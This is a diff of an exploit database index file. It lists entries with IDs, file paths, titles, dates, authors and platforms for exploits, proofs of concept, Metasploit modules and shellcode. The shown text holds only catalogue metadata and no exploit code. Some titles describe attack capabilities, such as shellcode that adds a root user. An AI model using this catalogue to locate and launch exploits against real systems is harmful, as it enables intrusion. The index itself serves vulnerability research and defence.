-33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002 +34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80 33991,platforms/php/remote/33991.rb,"Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0 @@ -30619,8 +30634,6 @@ id,file,description,date,author,platform,type,port 33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass Vulnerability",2010-05-17,SkuLL-HackeR,php,webapps,0 33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x SQL Injection and HTML Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0 -33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 - 'download.php' Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 -33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component - 'ComntrNam' Parameter Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA - 'list' Parameter Cross-Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0 @@ -30645,19 +30658,21 @@ id,file,description,date,author,platform,type,port 34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting Vulnerability",2010-01-13,PaL-D3v1L,php,webapps,0 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross-Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0 +34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0 34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0 34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC",2014-07-10,EccE,linux,remote,0 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0 -34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 - 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0 34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0 34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 - 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0 +34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80 34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0 34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 - 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0 +34189,platforms/php/webapps/34189.txt,"Sphider 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 - 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 - 'components.php' Cross-Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 - 'index.php' Cross-Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -30679,7 +30694,6 @@ id,file,description,date,author,platform,type,port 34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 34060,platforms/lin_x86/shellcode/34060.c,"Socket Re-use Shellcode for Linux x86 (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 -34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80 34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,metasploit,hardware,remote,1900 @@ -30691,6 +30705,12 @@ id,file,description,date,author,platform,type,port 34071,platforms/php/webapps/34071.txt,"Joomla! 'com_sar_news' Component - 'id' Parameter SQL Injection Vulnerability",2010-06-02,LynX,php,webapps,0 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting Vulnerability",2010-06-01,hexon,php,webapps,0 34073,platforms/php/webapps/34073.py,"TCExam <= 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload Vulnerability",2010-06-02,"John Leitch",php,webapps,0 +34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Include Vulnerability",2010-06-21,"Pouya Daneshmand",multiple,remote,0 +34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross-Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 +34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 +34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80 +34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0 +34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross-Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti Insecure Cookie Authentication Bypass Vulnerability",2010-06-02,Septemb0x,php,webapps,0 34078,platforms/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting Vulnerability",2010-06-02,Red-D3v1L,php,webapps,0 34079,platforms/php/webapps/34079.txt,"Sniggabo CMS 2.21 - 'search.php' Cross-Site Scripting Vulnerability",2010-01-06,Sora,php,webapps,0 @@ -30700,8 +30720,7 @@ id,file,description,date,author,platform,type,port 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross-Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0 -34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 -34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80 +34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross-Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple XSS Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80 34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0 @@ -30712,19 +30731,10 @@ id,file,description,date,author,platform,type,port 34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0 34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0 -34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80 -34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 -34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378 -34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 -34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0 -34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0 -34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0 -34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0 -34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0 -34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 -34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 -34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0 -34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross-Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 +34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0 +34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0 +34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 - Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0 +34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Parameter Cross-Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 @@ -30732,42 +30742,39 @@ id,file,description,date,author,platform,type,port 34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 +34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service Vulnerability",2010-07-15,"Luigi Auriemma",multiple,dos,0 +34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 SQL Injection and HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0 +34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 +34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80 +34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0 +34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 +34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0 +34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 +34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0 +34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0 +34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0 +34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0 +34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0 +34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 +34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download (0day)",2014-07-20,pSyCh0_3D,php,webapps,0 +34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80 34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross-Site Scripting Weakness",2010-06-10,"Tavis Ormandy",windows,remote,0 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0 -34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80 34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34134,platforms/lin_amd64/local/34134.c,"Linux Kernel - ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0 +34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 -34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Include Vulnerability",2010-06-21,"Pouya Daneshmand",multiple,remote,0 -34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross-Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 -34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross-Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0 -34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0 -34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 -34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 -34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0 -34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow Vulnerability",2010-06-14,"Mauro Olea",windows,remote,0 -34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component - 'Itemid' Parameter Cross-Site Scripting Vulnerability",2010-06-08,"L0rd CrusAd3r",php,webapps,0 -34145,platforms/unix/dos/34145.txt,"Python <= 3.2 - 'audioop' Module Memory Corruption Vulnerability",2010-06-14,haypo,unix,dos,0 -34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0 -34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'username' Parameter Cross-Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0 -34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0 34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure Vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0 -34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution Vulnerability",2010-06-16,h07,windows,dos,0 -34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0 -34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0 -34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0 -34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0 -34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 - Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0 -34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service Vulnerability",2010-06-17,"Luigi Auriemma",windows,dos,0 34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 SQL Injection and Local File Include Vulnerabilities",2010-06-18,jdc,php,webapps,0 +34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution Vulnerability",2010-06-16,h07,windows,dos,0 +34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0 34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80 -34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0 @@ -30777,6 +30784,7 @@ id,file,description,date,author,platform,type,port 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting Vulnerability",2014-07-27,"Mayuresh Dani",php,webapps,0 +34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0 34172,platforms/hardware/webapps/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,webapps,0 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI Vulnerability",2014-07-27,"black hat",php,webapps,0 34174,platforms/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Buffer Overflow Vulnerability",2010-08-18,"Luigi Auriemma",windows,remote,0 @@ -30793,13 +30801,12 @@ id,file,description,date,author,platform,type,port 34185,platforms/php/webapps/34185.txt,"Pre Projects Multi-Vendor Shopping Malls 'products.php' SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0 34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation Vulnerability",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0 34187,platforms/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability",2014-07-28,"Seth Art",hardware,webapps,80 -34189,platforms/php/webapps/34189.txt,"Sphider 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80 34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80 34192,platforms/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow Vulnerability",2010-06-22,"Martin Barbella",linux,remote,0 34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script Multiple SQL Injection Vulnerabilities",2010-06-24,"High-Tech Bridge SA",asp,webapps,0 34195,platforms/php/webapps/34195.txt,"Cimy Counter for WordPress 0.9.4 HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,php,webapps,0 -34196,platforms/ios/webapps/34196.txt,"WiFi HD v7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 +34196,platforms/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection Vulnerability",2010-06-25,JaMbA,php,webapps,0 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting Vulnerability",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting Vulnerability",2010-06-25,"Daniel King",hardware,remote,0 @@ -30843,7 +30850,11 @@ id,file,description,date,author,platform,type,port 34239,platforms/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 34240,platforms/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34241,platforms/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Local Root Vulnerability",2014-08-02,mra,linux,webapps,8080 +34336,platforms/php/webapps/34336.html,"Disqus for Wordpress 2.7.5 Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80 +34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 +34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-02,Vulnerability-Lab,ios,webapps,8080 +34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,metasploit,linux,remote,443 34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 (data.php) - Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow Vulnerability",2010-07-05,"Pedro Andujar",multiple,dos,0 @@ -30860,7 +30871,7 @@ id,file,description,date,author,platform,type,port 34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Parameter Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 34260,platforms/php/webapps/34260.txt,"odCMS 1.07 - 'archive.php' Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 34261,platforms/multiple/dos/34261.txt,"Unreal Engine <= 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow Vulnerability",2010-07-06,"Luigi Auriemma",multiple,dos,0 -34262,platforms/linux/shellcode/34262.c,"Shellcode Linux x86 - chmod (777 /etc/passwd & /etc/shadow), Add New Root User (ALI/ALI) & Execute /bin/sh",2014-08-04,"Ali Razmjoo",linux,shellcode,0 +34262,platforms/linux/shellcode/34262.c,"Shellcode Linux x86 - chmod (777 /etc/passwd & /etc/shadow)_ 